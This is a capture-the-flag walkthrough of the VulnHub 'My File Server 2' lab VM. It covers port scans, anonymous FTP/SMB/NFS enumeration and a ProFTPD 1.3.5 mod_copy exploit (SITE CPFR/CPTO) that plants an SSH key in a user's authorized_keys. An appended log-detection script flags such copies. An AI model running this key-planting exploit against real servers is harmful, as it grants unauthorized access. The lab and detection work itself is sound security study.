My File Server 2

Identify the Target Host IP Address

┌──(kali㉿kali)-[~/Vulnhub/My_File_Server_2]
└─$ sudo netdiscover -i eth1
4 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 240                                                                                                                                                             
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------
 192.168.56.100  08:00:27:3b:85:70      2     120  PCS Systemtechnik GmbH                                                                                                                                                    
 192.168.56.1    0a:00:27:00:00:0a      1      60  Unknown vendor                                                                                                                                                            
 192.168.56.104  08:00:27:30:9f:c5      1      60  PCS Systemtechnik GmbH    

Using netdiscover, which ships with Kali Linux, the target host's IP address is identified as 192.168.56.104.

NMAP Scan

┌──(kali㉿kali)-[~/Vulnhub/My_File_Server_2]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.104 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2022-11-09 07:03 EST
Nmap scan report for bogon (192.168.56.104)
Host is up (0.00028s latency).
Not shown: 64447 filtered tcp ports (no-response), 76 filtered tcp ports (host-prohibited), 1004 closed tcp ports (reset)
PORT      STATE SERVICE     VERSION
21/tcp    open  ftp         vsftpd 3.0.2
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_drwxrwxrwx    3 0        0              16 Feb 19  2020 pub [NSE: writeable]
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to ::ffff:192.168.56.137
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 1
|      vsFTPd 3.0.2 - secure, fast, stable
|_End of status
22/tcp    open  ssh         OpenSSH 7.4 (protocol 2.0)
| ssh-hostkey: 
|   2048 75:fa:37:d1:62:4a:15:87:7e:21:83:b9:2f:ff:04:93 (RSA)
|   256 b8:db:2c:ca:e2:70:c3:eb:9a:a8:cc:0e:a2:1c:68:6b (ECDSA)
|_  256 66:a3:1b:55:ca:c2:51:84:41:21:7f:77:40:45:d4:9f (ED25519)
80/tcp    open  http        Apache httpd 2.4.6 ((CentOS))
|_http-title: My File Server
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.6 (CentOS)
111/tcp   open  rpcbind     2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100003  3,4         2049/tcp   nfs
|   100003  3,4         2049/tcp6  nfs
|   100003  3,4         2049/udp   nfs
|   100003  3,4         2049/udp6  nfs
|   100005  1,2,3      20048/tcp   mountd
|   100005  1,2,3      20048/tcp6  mountd
|   100005  1,2,3      20048/udp   mountd
|   100005  1,2,3      20048/udp6  mountd
|   100021  1,3,4      50985/tcp6  nlockmgr
|   100021  1,3,4      51919/udp   nlockmgr
|   100021  1,3,4      57831/udp6  nlockmgr
|   100021  1,3,4      58961/tcp   nlockmgr
|   100024  1          35370/udp6  status
|   100024  1          36366/tcp   status
|   100024  1          38658/udp   status
|   100024  1          60484/tcp6  status
|   100227  3           2049/tcp   nfs_acl
|   100227  3           2049/tcp6  nfs_acl
|   100227  3           2049/udp   nfs_acl
|_  100227  3           2049/udp6  nfs_acl
445/tcp   open  netbios-ssn Samba smbd 4.9.1 (workgroup: SAMBA)
2049/tcp  open  nfs_acl     3 (RPC #100227)
2121/tcp  open  ftp         ProFTPD 1.3.5
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_Can't get directory listing: ERROR
20048/tcp open  mountd      1-3 (RPC #100005)
MAC Address: 08:00:27:30:9F:C5 (Oracle VirtualBox virtual NIC)
Service Info: Host: FILESERVER; OS: Unix

Host script results:
| smb2-time: 
|   date: 2022-11-09T12:04:32
|_  start_date: N/A
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   3.1.1: 
|_    Message signing enabled but not required
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.9.1)
|   Computer name: localhost
|   NetBIOS computer name: FILESERVER\x00
|   Domain name: \x00
|   FQDN: localhost
|_  System time: 2022-11-09T17:34:34+05:30
|_clock-skew: mean: -1h50m01s, deviation: 3h10m30s, median: -2s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 84.09 seconds

Get Access

Gather information on each port found by the NMAP scan, one at a time.

┌──(kali㉿kali)-[~/Vulnhub/My_File_Server_2]
└─$ ftp 192.168.56.104        
Connected to 192.168.56.104.
220 (vsFTPd 3.0.2)
Name (192.168.56.104:kali): anonymous
331 Please specify the password.
Password: 
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -alh
229 Entering Extended Passive Mode (|||5708|).
150 Here comes the directory listing.
drwxr-xr-x    3 0        0              16 Feb 18  2020 .
drwxr-xr-x    3 0        0              16 Feb 18  2020 ..
drwxrwxrwx    3 0        0              16 Feb 19  2020 pub
226 Directory send OK.
ftp> cd pub
250 Directory successfully changed.
ftp> ls -alh
229 Entering Extended Passive Mode (|||5615|).
150 Here comes the directory listing.
drwxrwxrwx    3 0        0              16 Feb 19  2020 .
drwxr-xr-x    3 0        0              16 Feb 18  2020 ..
drwxr-xr-x    9 0        0            4096 Feb 19  2020 log
226 Directory send OK.
ftp> cd log
250 Directory successfully changed.
ftp> ls -alh
229 Entering Extended Passive Mode (|||5228|).
150 Here comes the directory listing.
drwxr-xr-x    9 0        0            4096 Feb 19  2020 .
drwxrwxrwx    3 0        0              16 Feb 19  2020 ..
drwxr-xr-x    2 0        0            4096 Feb 19  2020 anaconda
drwxr-x---    2 0        0              22 Feb 19  2020 audit
-rw-r--r--    1 0        0            7033 Feb 19  2020 boot.log
-rw-------    1 0        0           10752 Feb 19  2020 btmp
-rw-r--r--    1 0        0            9161 Feb 19  2020 cron
-rw-r--r--    1 0        0           31971 Feb 19  2020 dmesg
-rw-r--r--    1 0        0           31971 Feb 19  2020 dmesg.old
drwxr-xr-x    2 0        0               6 Feb 19  2020 glusterfs
drwx------    2 0        0              39 Feb 19  2020 httpd
-rw-r--r--    1 0        0          292584 Feb 19  2020 lastlog
-rw-------    1 0        0            3764 Feb 19  2020 maillog
-rw-------    1 0        0         1423423 Feb 19  2020 messages
drwx------    2 0        0               6 Feb 19  2020 ppp
drwx------    4 0        0              43 Feb 19  2020 samba
-rw-------    1 0        0           63142 Feb 19  2020 secure
-rw-------    1 0        0               0 Feb 19  2020 spooler
-rw-------    1 0        0               0 Feb 19  2020 tallylog
drwxr-xr-x    2 0        0              22 Feb 19  2020 tuned
-rw-r--r--    1 0        0           58752 Feb 19  2020 wtmp
-rw-------    1 0        0             100 Feb 19  2020 xferlog
-rw-------    1 0        0           18076 Feb 19  2020 yum.log
226 Directory send OK.
ftp> cd audit
550 Failed to change directory.
ftp> cd audit
550 Failed to change directory.
ftp> get dmesg
local: dmesg remote: dmesg
229 Entering Extended Passive Mode (|||5558|).
150 Opening BINARY mode data connection for dmesg (31971 bytes).
100% |*********************************************************************************************************************************************************************************| 31971       31.56 MiB/s    00:00 ETA
226 Transfer complete.
31971 bytes received in 00:00 (18.01 MiB/s)
ftp> get messages
local: messages remote: messages
229 Entering Extended Passive Mode (|||5930|).
550 Failed to open file.
ftp> quit
221 Goodbye.
                                                                                                                                                                                                                              
┌──(kali㉿kali)-[~/Vulnhub/My_File_Server_2]
└─$ smbclient -L 192.168.56.104                                
Password for [WORKGROUP\kali]:
Anonymous login successful

        Sharename       Type      Comment
        ---------       ----      -------
        print$          Disk      Printer Drivers
        smbdata         Disk      smbdata
        smbuser         Disk      smbuser
        IPC$            IPC       IPC Service (Samba 4.9.1)
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 192.168.56.104 failed (Error NT_STATUS_HOST_UNREACHABLE)
Unable to connect with SMB1 -- no workgroup available
                                                                                                                                                                                                                              
┌──(kali㉿kali)-[~/Vulnhub/My_File_Server_2]
└─$ smbclient //192.168.56.104/smbdata
Password for [WORKGROUP\kali]:
Anonymous login successful
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Fri Feb 21 01:50:09 2020
  ..                                  D        0  Tue Feb 18 06:47:54 2020
  anaconda                            D        0  Tue Feb 18 06:48:15 2020
  audit                               D        0  Tue Feb 18 06:48:15 2020
  boot.log                            N     6120  Tue Feb 18 06:48:16 2020
  btmp                                N      384  Tue Feb 18 06:48:16 2020
  cron                                N     4813  Tue Feb 18 06:48:16 2020
  dmesg                               N    31389  Tue Feb 18 06:48:16 2020
  dmesg.old                           N    31389  Tue Feb 18 06:48:16 2020
  glusterfs                           D        0  Tue Feb 18 06:48:16 2020
  lastlog                             N   292292  Tue Feb 18 06:48:16 2020
  maillog                             N     1982  Tue Feb 18 06:48:16 2020
  messages                            N   684379  Tue Feb 18 06:48:17 2020
  ppp                                 D        0  Tue Feb 18 06:48:17 2020
  samba                               D        0  Tue Feb 18 06:48:17 2020
  secure                              N    11937  Tue Feb 18 06:48:17 2020
  spooler                             N        0  Tue Feb 18 06:48:17 2020
  tallylog                            N        0  Tue Feb 18 06:48:17 2020
  tuned                               D        0  Tue Feb 18 06:48:17 2020
  wtmp                                N    25728  Tue Feb 18 06:48:17 2020
  xferlog                             N      100  Tue Feb 18 06:48:17 2020
  yum.log                             N    10915  Tue Feb 18 06:48:17 2020
  sshd_config                         N     3906  Wed Feb 19 02:46:38 2020
  authorized_keys                     A      389  Fri Feb 21 01:50:09 2020

                19976192 blocks of size 1024. 18285224 blocks available
smb: \> cd sshd_config 
cd \sshd_config\: NT_STATUS_NOT_A_DIRECTORY
smb: \> get sshd_config 
getting file \sshd_config of size 3906 as sshd_config (1907.1 KiloBytes/sec) (average 1907.2 KiloBytes/sec)
smb: \> quit
                                                                                                                                                                                                                              
┌──(kali㉿kali)-[~/Vulnhub/My_File_Server_2]
└─$ smbclient //192.168.56.104/smbuser
Password for [WORKGROUP\kali]:
Anonymous login successful
tree connect failed: NT_STATUS_ACCESS_DENIED

┌──(kali㉿kali)-[~/Vulnhub/My_File_Server_2]
└─$ ftp 192.168.56.104 -P 2121
Connected to 192.168.56.104.
220 ProFTPD 1.3.5 Server (ProFTPD Default Installation) [192.168.56.104]
Name (192.168.56.104:kali): anonymous
331 Anonymous login ok, send your complete email address as your password
Password: 
230 Anonymous access granted, restrictions apply
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -alh
229 Entering Extended Passive Mode (|||19147|)
ftp: Can't connect to `192.168.56.104:19147': No route to host
200 EPRT command successful
150 Opening ASCII mode data connection for file list
drwxr-xr-x   3 root     root           16 Feb 18  2020 .
drwxr-xr-x   3 root     root           16 Feb 18  2020 ..
drwxrwxrwx   3 root     root           16 Feb 19  2020 pub
226 Transfer complete
ftp> cd pub
250 CWD command successful
ftp> ls -alh
200 EPRT command successful
150 Opening ASCII mode data connection for file list
drwxrwxrwx   3 root     root           16 Feb 19  2020 .
drwxr-xr-x   3 root     root           16 Feb 18  2020 ..
drwxr-xr-x   9 root     root         4.0k Feb 19  2020 log
226 Transfer complete
ftp> cd log
250 CWD command successful
ftp> ls 
200 EPRT command successful
150 Opening ASCII mode data connection for file list
drwxr-xr-x   2 root     root         4096 Feb 19  2020 anaconda
drwxr-x---   2 root     root           22 Feb 19  2020 audit
-rw-r--r--   1 root     root         7033 Feb 19  2020 boot.log
-rw-------   1 root     root        10752 Feb 19  2020 btmp
-rw-r--r--   1 root     root         9161 Feb 19  2020 cron
-rw-r--r--   1 root     root        31971 Feb 19  2020 dmesg
-rw-r--r--   1 root     root        31971 Feb 19  2020 dmesg.old
drwxr-xr-x   2 root     root            6 Feb 19  2020 glusterfs
drwx------   2 root     root           39 Feb 19  2020 httpd
-rw-r--r--   1 root     root       292584 Feb 19  2020 lastlog
-rw-------   1 root     root         3764 Feb 19  2020 maillog
-rw-------   1 root     root      1423423 Feb 19  2020 messages
drwx------   2 root     root            6 Feb 19  2020 ppp
drwx------   4 root     root           43 Feb 19  2020 samba
-rw-------   1 root     root        63142 Feb 19  2020 secure
-rw-------   1 root     root            0 Feb 19  2020 spooler
-rw-------   1 root     root            0 Feb 19  2020 tallylog
drwxr-xr-x   2 root     root           22 Feb 19  2020 tuned
-rw-r--r--   1 root     root        58752 Feb 19  2020 wtmp
-rw-------   1 root     root          100 Feb 19  2020 xferlog
-rw-------   1 root     root        18076 Feb 19  2020 yum.log
226 Transfer complete
ftp> quit
221 Goodbye.
                                                                                                                                                                                                                              
┌──(kali㉿kali)-[~/Vulnhub/My_File_Server_2]
└─$ searchsploit proftpd 1.3.5        
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                                                                                                              |  Path
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
ProFTPd 1.3.5 - 'mod_copy' Command Execution (Metasploit)                                                                                                                                   | linux/remote/37262.rb
ProFTPd 1.3.5 - 'mod_copy' Remote Command Execution                                                                                                                                         | linux/remote/36803.py
ProFTPd 1.3.5 - 'mod_copy' Remote Command Execution (2)                                                                                                                                     | linux/remote/49908.py
ProFTPd 1.3.5 - File Copy                                                                                                                                                                   | linux/remote/36742.txt
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

┌──(kali㉿kali)-[~/Vulnhub/My_File_Server_2]
└─$ gobuster dir -u http://192.168.56.104 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.txt,.html,.sh
===============================================================
Gobuster v3.2.0-dev
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.104
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.2.0-dev
[+] Extensions:              php,txt,html,sh
[+] Timeout:                 10s
===============================================================
2022/11/09 07:25:30 Starting gobuster in directory enumeration mode
===============================================================
/index.html           (Status: 200) [Size: 174]
/.html                (Status: 403) [Size: 207]
/readme.txt           (Status: 200) [Size: 25]
/.html                (Status: 403) [Size: 207]
Progress: 1101100 / 1102805 (99.85%)===============================================================
2022/11/09 07:27:46 Finished
===========================================================
                                                                                                                                                                                                                              
┌──(kali㉿kali)-[~/Vulnhub/My_File_Server_2]
└─$ curl http://192.168.56.104/readme.txt     
My Password is
rootroot1
                          

Try logging in over SSH:

┌──(kali㉿kali)-[~/Vulnhub/My_File_Server_2]
└─$ ssh root@192.168.56.104           
The authenticity of host '192.168.56.104 (192.168.56.104)' can't be established.
ED25519 key fingerprint is SHA256:ccn0TgE4/OXtSpg3oMO2gVNYXrps4Zi+XcBgaDZnW78.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.56.104' (ED25519) to the list of known hosts.
   ##############################################################################################
   #                                      Armour Infosec                                        #
   #                         --------- www.armourinfosec.com ------------                       #
   #                                    My File Server - 2                                      #
   #                               Designed By  :- Akanksha Sachin Verma                        #
   #                               Twitter      :- @akankshavermasv                             #
   ##############################################################################################

root@192.168.56.104: Permission denied (publickey,gssapi-keyex,gssapi-with-mic).

Only public/private key login is accepted.

┌──(kali㉿kali)-[~/Vulnhub/My_File_Server_2]
└─$ sudo nmap -sC -p 445 --script=smb-enum* 192.168.56.104     
[sudo] password for kali: 
Starting Nmap 7.92 ( https://nmap.org ) at 2022-11-09 07:37 EST
Nmap scan report for bogon (192.168.56.104)
Host is up (0.00032s latency).

PORT    STATE SERVICE
445/tcp open  microsoft-ds
MAC Address: 08:00:27:30:9F:C5 (Oracle VirtualBox virtual NIC)

Host script results:
| smb-enum-domains: 
|   FILESERVER
|     Groups: n/a
|     Users: smbuser
|     Creation time: unknown
|     Passwords: min length: 5; min age: n/a days; max age: n/a days; history: n/a passwords
|     Account lockout disabled
|   Builtin
|     Groups: n/a
|     Users: n/a
|     Creation time: unknown
|     Passwords: min length: 5; min age: n/a days; max age: n/a days; history: n/a passwords
|_    Account lockout disabled
| smb-enum-users: 
|   FILESERVER\smbuser (RID: 1000)
|     Full name:   
|     Description: 
|_    Flags:       Normal user account
| smb-enum-shares: 
|   account_used: <blank>
|   \\192.168.56.104\IPC$: 
|     Type: STYPE_IPC_HIDDEN
|     Comment: IPC Service (Samba 4.9.1)
|     Users: 2
|     Max Users: <unlimited>
|     Path: C:\tmp
|     Anonymous access: READ/WRITE
|   \\192.168.56.104\print$: 
|     Type: STYPE_DISKTREE
|     Comment: Printer Drivers
|     Users: 0
|     Max Users: <unlimited>
|     Path: C:\var\lib\samba\drivers
|     Anonymous access: <none>
|   \\192.168.56.104\smbdata: 
|     Type: STYPE_DISKTREE
|     Comment: smbdata
|     Users: 0
|     Max Users: <unlimited>
|     Path: C:\smbdata
|     Anonymous access: READ/WRITE
|   \\192.168.56.104\smbuser: 
|     Type: STYPE_DISKTREE
|     Comment: smbuser
|     Users: 0
|     Max Users: <unlimited>
|     Path: C:\home\smbuser\
|_    Anonymous access: <none>
| smb-enum-sessions: 
|_  <nobody>

Nmap done: 1 IP address (1 host up) scanned in 300.33 seconds

Port 2049 is open on the target host (file sharing); check whether it can be accessed.

┌──(kali㉿kali)-[~/Vulnhub/My_File_Server_2]
└─$ mount -t nfs -o tcp,nolock 192.168.56.104:/smbdata /tmp/mnt        
mount.nfs: failed to apply fstab options

The mount fails; running the command with sudo works.

┌──(kali㉿kali)-[~/Vulnhub/My_File_Server_2]
└─$ sudo mount -t nfs 192.168.56.104:/smbdata tmp   
[sudo] password for kali: 
                                                                                                                                                                                                                              
┌──(kali㉿kali)-[~/Vulnhub/My_File_Server_2]
└─$ cd /tmp                                                  
                                                                                                                                                                                                                              
┌──(kali㉿kali)-[/tmp]
└─$ cd ~/Vulnhub/My_File_Server_2 
                                                                                                                                                                                                                              
┌──(kali㉿kali)-[~/Vulnhub/My_File_Server_2]
└─$ ls
49908.py  dmesg  nmap_full_scan  sshd_config  tmp
                                                                                                                                                                                                                              
┌──(kali㉿kali)-[~/Vulnhub/My_File_Server_2]
└─$ cd tmp                       
                                                                                                                                                                                                                              
┌──(kali㉿kali)-[~/Vulnhub/My_File_Server_2/tmp]
└─$ ls -alh             
total 856K
drwxrwxrwx 8 root root 4.0K Nov  9 07:37 .
drwxr-xr-x 3 kali kali 4.0K Nov  9 07:49 ..
drwxrwxrwx 2 root root 4.0K Feb 18  2020 anaconda
drwxrwxrwx 2 root root   22 Feb 18  2020 audit
-rwxr--r-- 1   99   99  389 Feb 21  2020 authorized_keys
-rwxrwxrwx 1 root root 6.0K Feb 18  2020 boot.log
-rwxrwxrwx 1 root root  384 Feb 18  2020 btmp
-rwxrwxrwx 1 root root 4.8K Feb 18  2020 cron
-rwxrwxrwx 1 root root  31K Feb 18  2020 dmesg
-rwxrwxrwx 1 root root  31K Feb 18  2020 dmesg.old
drwxrwxrwx 2 root root    6 Feb 18  2020 glusterfs
-rwxrwxrwx 1 root root 286K Feb 18  2020 lastlog
-rwxrwxrwx 1 root root 2.0K Feb 18  2020 maillog
-rwxrwxrwx 1 root root 669K Feb 18  2020 messages
drwxrwxrwx 2 root root    6 Feb 18  2020 ppp
drwxrwxrwx 4 root root   43 Feb 18  2020 samba
-rwxrwxrwx 1 root root  12K Feb 18  2020 secure
-rwxrwxrwx 1 root root    0 Feb 18  2020 spooler
-rw-r--r-- 1   99   99 3.9K Feb 19  2020 sshd_config
-rwxrwxrwx 1 root root    0 Feb 18  2020 tallylog
drwxrwxrwx 2 root root   22 Feb 18  2020 tuned
-rwxrwxrwx 1 root root  26K Feb 18  2020 wtmp
-rwxrwxrwx 1 root root  100 Feb 18  2020 xferlog
-rwxrwxrwx 1 root root  11K Feb 18  2020 yum.log
                                                                                                                                                                                                                              
┌──(kali㉿kali)-[~/Vulnhub/My_File_Server_2/tmp]
└─$ 

Next, look at ProFTPD: version 1.3.5 has a file copy vulnerability (the mod_copy entries in the searchsploit results above).

┌──(kali㉿kali)-[~/Vulnhub/My_File_Server_2/tmp]
└─$ cp /home/kali/.ssh/id_rsa.pub tmp
                                                                                                                                                                                                                              
┌──(kali㉿kali)-[~/Vulnhub/My_File_Server_2/tmp]
└─$ telnet 192.168.56.104 2121       
Trying 192.168.56.104...
Connected to 192.168.56.104.
Escape character is '^]'.
220 ProFTPD 1.3.5 Server (ProFTPD Default Installation) [192.168.56.104]
help
214-The following commands are recognized (* =>'s unimplemented):
 CWD     XCWD    CDUP    XCUP    SMNT*   QUIT    PORT    PASV    
 EPRT    EPSV    ALLO*   RNFR    RNTO    DELE    MDTM    RMD     
 XRMD    MKD     XMKD    PWD     XPWD    SIZE    SYST    HELP    
 NOOP    FEAT    OPTS    AUTH*   CCC*    CONF*   ENC*    MIC*    
 PBSZ*   PROT*   TYPE    STRU    MODE    RETR    STOR    STOU    
 APPE    REST    ABOR    USER    PASS    ACCT*   REIN*   LIST    
 NLST    STAT    SITE    MLSD    MLST    
214 Direct comments to root@localhost
site help
214-The following SITE commands are recognized (* =>'s unimplemented)
 CPFR <sp> pathname
 CPTO <sp> pathname
 HELP
 CHGRP
 CHMOD
214 Direct comments to root@localhost
site CPFR /smbdata/id_rsa.pub
550 /smbdata/id_rsa.pub: No such file or directory
site CPFR /smbdata/id_rsa.pub
350 File or directory exists, ready for destination name
site CPTO /home/smbuser/.ssh/authorized_keys
250 Copy successful


└─$ ls
anaconda  audit  authorized_keys  boot.log  btmp  cron  dmesg  dmesg.old  glusterfs  lastlog  maillog  messages  passwd_copy  ppp  samba  secure  spooler  sshd_config  tallylog  tmp  tuned  wtmp  xferlog  yum.log
                                                                                                                                                                                                                              
┌──(kali㉿kali)-[~/Vulnhub/My_File_Server_2/tmp]
└─$ cp ~/.ssh/id_rsa.pub .                                                    
                                                                                                                                                                                                                              
┌──(kali㉿kali)-[~/Vulnhub/My_File_Server_2/tmp]
└─$ cp ~/.ssh/id_rsa .    
                                                                                                                                                                                                                              
┌──(kali㉿kali)-[~/Vulnhub/My_File_Server_2/tmp]
└─$ ssh -i id_rsa smbuser@192.168.56.104
   ##############################################################################################
   #                                      Armour Infosec                                        #
   #                         --------- www.armourinfosec.com ------------                       #
   #                                    My File Server - 2                                      #
   #                               Designed By  :- Akanksha Sachin Verma                        #
   #                               Twitter      :- @akankshavermasv                             #
   ##############################################################################################

Last login: Fri Feb 21 12:39:36 2020
[smbuser@fileserver ~]$ 
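
A defender-side view of the SITE CPFR / SITE CPTO exchange above, as an added example that is not part of the original write-up: it pairs the two commands per client in a ProFTPD ExtendedLog and flags copies made without a login or touching sensitive paths. The log layout (`LogFormat "%h %l %u %t \"%r\" %s"`), the `SENSITIVE` patterns, all function and class names, and the sample lines (timestamps included) are assumptions constructed for illustration.

```python
import re
from dataclasses import dataclass, field

# Assumed ExtendedLog layout: LogFormat "%h %l %u %t \"%r\" %s"
LINE_RE = re.compile(
    r'^(?P<host>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<cmd>[^"]*)" (?P<code>\d{3})'
)
SITE_RE = re.compile(r'^SITE\s+(CPFR|CPTO)\s+(.+)$', re.IGNORECASE)

# Illustrative (hypothetical) list of locations a server-side copy should never touch.
SENSITIVE = [re.compile(p) for p in (r'/\.ssh/', r'^/etc/', r'^/root/', r'^/var/www/')]


@dataclass
class CopyEvent:
    host: str
    user: str
    timestamp: str
    source: str
    dest: str
    reasons: list = field(default_factory=list)

    @property
    def severity(self):
        return 'high' if self.reasons else 'info'


def find_mod_copy_events(lines):
    """Pair each accepted SITE CPFR (350) with the next successful SITE CPTO (250)."""
    pending = {}   # client host -> source path accepted by CPFR
    events = []
    for line in lines:
        m = LINE_RE.match(line.strip())
        site = SITE_RE.match(m['cmd']) if m else None
        if not site:
            continue
        verb, path = site.group(1).upper(), site.group(2).strip()
        host = m['host']
        if verb == 'CPFR':
            # Only a 350 reply means the server accepted the source path.
            if m['code'] == '350':
                pending[host] = path
            else:
                pending.pop(host, None)
            continue
        source = pending.pop(host, None)
        if source is None or m['code'] != '250':
            continue   # CPTO without an accepted CPFR, or the copy failed
        event = CopyEvent(host, m['user'], m['ts'], source, path)
        if m['user'] == '-':
            event.reasons.append('copy issued without a logged-in user')
        for label, value in (('source', source), ('destination', path)):
            if any(p.search(value) for p in SENSITIVE):
                event.reasons.append(f'{label} is a sensitive path')
        events.append(event)
    return events


# Constructed sample log lines (not captured from the target).
SAMPLE_LOG = """\
192.168.56.137 UNKNOWN - [09/Nov/2022:18:19:40 +0530] "SITE CPFR /smbdata/id_rsa.pub" 550
192.168.56.137 UNKNOWN - [09/Nov/2022:18:20:01 +0530] "SITE CPFR /smbdata/id_rsa.pub" 350
192.168.56.137 UNKNOWN - [09/Nov/2022:18:20:09 +0530] "SITE CPTO /home/smbuser/.ssh/authorized_keys" 250
192.168.56.1 UNKNOWN ftp [09/Nov/2022:18:25:00 +0530] "LIST -alh" 226
192.168.56.1 UNKNOWN ftp [09/Nov/2022:18:26:00 +0530] "SITE CPFR /pub/log/dmesg" 350
192.168.56.1 UNKNOWN ftp [09/Nov/2022:18:26:05 +0530] "SITE CPTO /pub/log/dmesg.bak" 250
""".splitlines()

if __name__ == '__main__':
    for ev in find_mod_copy_events(SAMPLE_LOG):
        print(f'[{ev.severity}] {ev.host} {ev.source} -> {ev.dest} {ev.reasons}')
```

Pairing is keyed on the client address, which is a simplification; if the log format carries a per-session identifier, key on that instead.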

Privilege Escalation

Privilege escalation is straightforward, because the root password was already obtained earlier.


Original article: http://www.cnblogs.com/jason-huawen/p/16875212.html
